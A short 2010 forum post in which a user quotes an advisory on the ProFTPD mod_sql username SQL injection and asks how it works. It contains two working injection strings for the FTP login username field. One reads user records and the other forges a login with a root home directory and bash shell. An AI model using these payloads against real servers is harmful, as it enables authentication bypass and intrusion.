ProFTPD 'mod_sql' Username SQL Injection Vulnerability

Ye' old general discussion board. Basically, for everything that isn't covered elsewhere. Come here to shoot the breeze, shoot your mouth off, or whatever suits your fancy.
This forum is not for asking programming related questions.

Moderator: General Moderators

Post Reply
akmal2010
Forum Newbie
Posts: 1
Joined: Tue Mar 09, 2010 4:39 pm

ProFTPD 'mod_sql' Username SQL Injection Vulnerability

Post by akmal2010 »

Hi...
Anyone can explain about this SQL Injection cording please......

Attackers can use standard tools to exploit this issue.

The following example input is available:

username: %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --
password: 1

username: %') and 1=2 union (select <name>,1,<uid>,<gid>,0x2F,0x2F62696E2F62617368); -- a

The following exploit is available:

* /data/vulnerabilities/exploits/33722.pl
Post Reply